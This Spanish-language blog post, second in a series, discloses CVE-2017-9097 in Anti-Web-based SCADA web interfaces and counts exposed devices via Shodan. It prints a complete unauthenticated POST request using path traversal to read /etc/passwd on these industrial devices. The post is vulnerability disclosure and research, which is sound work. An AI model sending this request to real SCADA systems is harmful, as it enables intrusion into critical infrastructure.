En la primera parte en la lista de casos con los que cuenta el portal “The Repository of Industrial Security Incidents” no solo encontraremos los clásicos ataques informáticos contra ICS, también figuran (encontré accidentalmente) dos que evidencian lo susceptibles que son a la denegación de servicio.

Uno de los casos:

Figura 1:  PLCs Crashed by IT Audit

Como profesionales responsables y sabiendo de la potencialidad de generar una denegación de servicio accidentalmente es poco recomendable utilizar escáneres de vulnerabilidades, priorizando las pruebas manuales.

Resumiendo, las distintas evaluaciones de seguridad requieren un trato más delicado.

Hallazgo seleccionado: “SCADA; #(multi)vendor”

En el camino hemos dado con varios hallazgos dignos de mención. Finalmente me decidí presentar uno que afecta a SCADAS de distintos vendors, con  web server  (“Anti-Web 3.x.x < 3.8.x”) en común:

Estos devices ya cuentan con dos similares y viejos CVEs (CVE-2010-4730 & CVE-2010-4733) nosotros sumamos un tercero a la lista (CVE-2017-9097) e inmediatamente un primer vendor (netbiter) lanzó un parche. El front web de los dispositivos en cuestión, cuentan con un login form y tienen el siguiente aspecto:

Figura 2:  Smart Qmmunicator

 

Figura 3:  netbinder

Figura 3:  Ouman EH-net

Para tener una referencia aproximada del grado de exposición con la que cuentan esto dispositivos nos valemos de los hosts que se encuentran indexados en Shodan, siendo estos un poco mayor a 800 dispositivos que responden al criterio de búsqueda “anti-web” de la siguiente manera:

Figura 4:  búsqueda en Shodan

Figura 5: puertos y servicios disponibles

 

De esta manera se vende “la solución”:

Figura 6: esquema de conectividad

De esta manera rompemos “la solución”:

Explotando un LFI:

Un “LFI” es una vulnerabilidad sobre aplicaciones web que permiten la inclusión de archivos locales, es decir aquellos ficheros que se encuentran en el mismo servidor de la web. La vulnerabilidad radica en la posibilidad de modificar en origen de estos archivos.

La aplicaciones web de los dispositivos testeados permiten las obtención de archivos alojados en el server. Enviando una petición POST adulterada, apuntando a archivos existentes en el servidor. Sin necesidad de ningún tipo de credencial.

Reproducción (simple request):

POST /cgi-bin/write.cgi HTTP/1.1
Host: <host>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-AR,en-US;q=0.7,en;q=0.3
Referer: http://<host>/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 52

page=/&template=../../../../../../etc/passwd

Figura 7: request

En unas 48hs de reportado el hallazgo, un lindo advisory:

Figura 8:advisory

En la tercera y última parte se explicará detalladamente como explotar un RCE.

Por @capitan_alfa

Accediendo a SCADAs vulnerables – Parte I

Accediendo a SCADAs vulnerables – Parte II

Accediendo a SCADAs vulnerables – Parte III

 

Estimados lectores, esta historia continuará :P En la siguiente parte publicaré el análisis de un hallazgo realizado y luego se publicará como se “rompe” la solución.

Aunque en el disclaimer de este blog lo aclaro, no sobra recordar que el contenido de este portal web es netamente de carácter educativo y científico; NO me responsabilizo del uso que el visitante haga del contenido aquí expuesto, ni de las opiniones ó informaciones de las distintas personas que puedan haber escrito en los diferentes artículos.

Igualmente no me responsabilizo del contenido de otras webs, ni de los links que se expongan en las mismas del material linqueado desde este portal. Es importante aclarar expresamente que el material linqueado a otras webs no pertenece a esta web y por lo tanto en caso hipotético el dicho material fuera ilegal deberá comunicarse inmediatamente al servidor web en donde estén alojados “físicamente” estos documentos y/o archivos.

Nos vemos en la siguiente parte de este post…..va a estar suuuuuuuuuper interesante ;)

2 Responses to Accediendo a SCADAs vulnerables – Parte II
  1. […] Accediendo a SCADAs vulnerables – Parte II […]

  2. […] con los post titulados “Accediendo a SCADAs Vulnerables” Parte I y Parte II, paso a transcribirles la última parte escrita por @capitan_alfa como producto de su interesante […]


[top]

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *